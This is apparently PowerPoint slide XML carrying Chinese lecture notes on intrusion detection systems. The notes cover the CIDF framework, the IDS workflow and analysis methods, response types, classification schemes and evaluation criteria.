              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>之间的组件重用，所以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>CIDF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>也是构建分布式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>的基础</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="黑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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>除了不同</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>之间协同以外，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CheckPoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>公司还倡导和发起了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>网络安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>方面的一种开放式平台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>OPSEC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>OPSEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>有包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>300</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>多家经过严格授权的、致力于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>网络安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>各方面研究的软件和硬件合作厂商。比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>和防火墙联动，防毒网关和防火墙联动等等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="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en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在通用入侵检测框架的基础上，一个典型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的工作流程基本上包括三个步骤：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、首先是信息收集过程。在这个过程中，主要针对用户在网络、信息系统、数据库以及应用系统中的活动状态和行为进行收集；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、然后对收集到的信息进行相关分析。在这个过程中的分析方法主要包括基于模式匹配的分析、基于统计的分析和数据的完整性分析等等；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、最后，针对分析的结果进行响应。入侵检测系统的响应分为被动响应和主动响应两种。被动响应主要是通过记录日志、各种报警等方式将异常情况通知到网络管理员，主动响应则是采取积极主动的措施及时阻断网络入侵，例如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>阻断、防火墙联动等等。</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信息收集是入侵检测系统的基础和前提，可以说对于入侵识别的准确性很大程度上以来收集到的信息的可靠性和正确性。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0"/>
              <a:t>因此，入侵检测系统往往会在网络中若干不同的关键节点上收集信息，这些信息可能包括：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、系统和网络日志；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、网络数据流量；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、非正常的文件或者目录变化；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、非正常的程序执行等等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>要尽可能的扩大信息收集的范围，因为从一个源收集到的信息可能看不出疑点，必须多个来源收集到的信息进行综合分析判断。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>同时，也必须保证入侵检测系统自身的坚固性，防止被篡改而收集到错误的信息。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收集到的有关信息，被送到事件分析器进行分析，一般通过三种技术手段进行分析 。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>第一种分析方式是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>模式匹配。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>就是将收集到的信息与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>已知的网络入侵模式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据库进行比较，从而发现违背安全策略的行为。一般来讲，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一种攻击模式可以用一个过程（如执行一条指令）或一个输出（如获得权限）来表示。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>这个过程可以很简单（如通过字符串匹配以寻找一个简单的条目或指令），也可以很复杂（如利用正规的数学表达式来表示安全状态的变化）。</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第二种分析方法是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>统计分析。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>该分析方法的基本前提就是假定所有入侵行为都与正常行为不同。在这个假设前提下，首先给用户、文件、目录和设备等系统对象创建一个统计描述，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>统计正常使用时的一些测量属性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（如访问次数、操作失败次数和延时等等）。然后根据收到的信息计算当前行为的测量属性的平均值和偏差，任何当前行为的观察值在正常范围之外时，就认为发生了入侵。</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完整性分析更关注某个文件或者系统对象是否被非法的更改。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>包括文件的内容和属性是否发生变化；目录的内容或者属性是否发生变化等等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>完整性分析在发现被恶意代码感染的应用程序方面效果特别明显。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr 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336238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主动响应：用户驱动或系统本身自动执行，对入侵行为终止网络连接，修正系统环境等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>被动响应：发出告警信息和通知等</a:t>
            </a:r>
            <a:endParaRPr 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113466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接下来，我们谈一谈入侵检测系统的分类问题。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>按照对入侵行为的检测方法，可以将入侵检测系统分为两类：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一类是异常检测模型：即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>总结合法、正常操作具有的特征，构建合法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用户轮廓。把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当前行为特征与合法用户轮廓进行比较，当存在重大偏离时，认定当前行为是是入侵行为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>另外一类是误用检测模型：即建立入侵行为的特征库，把当前行为与入侵行为特征库进行比较，若匹配则认定当前行为为入侵行为。</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">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按照对入侵检测信息来源进行分类，可以将入侵检测系统分为三类：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一类是基于主机的入侵检测系统：该类系统进行信息收集的主要对象是系统运行所在的主机，其要保护的目标也主要是系统运行所在的主机；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>第二类是基于网络的入侵检测系统：该类系统获取信息的主要来源是网络中传输的网络数据包，其主要保护目标是网络系统的正常运行；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>第三类就是混合型入侵检测系统：该类系统即从主机收集信息，也从网络数据包中获取信息，然后根据两方面的信息进行综合的入侵行为分析和判断。</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此外，依据入侵检测系统的体系结构和各模块的运行方式，可以分为两类：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一类是集中制入侵检测系统，该类系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的各个模块（包括数据的收集、分析模块等）都集中在一台主机上运行；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>另外一类是分布式入侵检测系统，该类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统的各个模块则分布在不同的计算机和设备上。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>最后，按照检测分析的时效性可以将入侵检测系统分为脱机分析型和联机分析型两类。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>顾名思义，脱机分析主要在入侵行为发生后对产生的数据进行分析；而联机分析型则需要在入侵行为发生的同时进行相关的分析、识别。</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在入侵检测概述一节的最后，我们讨论下入侵检测系统的评价标准的问题。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在评价一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统时，我们主要会从功能、性能和可用性三个方面进行评价。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>功能主要评价系统自身的功能特征。例如：系统的架构是否支持可扩展性，是否支持规则定制，警报系统功能是否强大等等；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>性能主要评价系统在高工作负载条件下的运行情况。例如：数据包截获或者过滤的速度，是否出现丢包，检测引擎的总体吞吐量等等；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>而可用性评价主要衡量用户在使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统时的操作友好性。例如：接面设计是否合理，使用是否方便的等等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRP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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
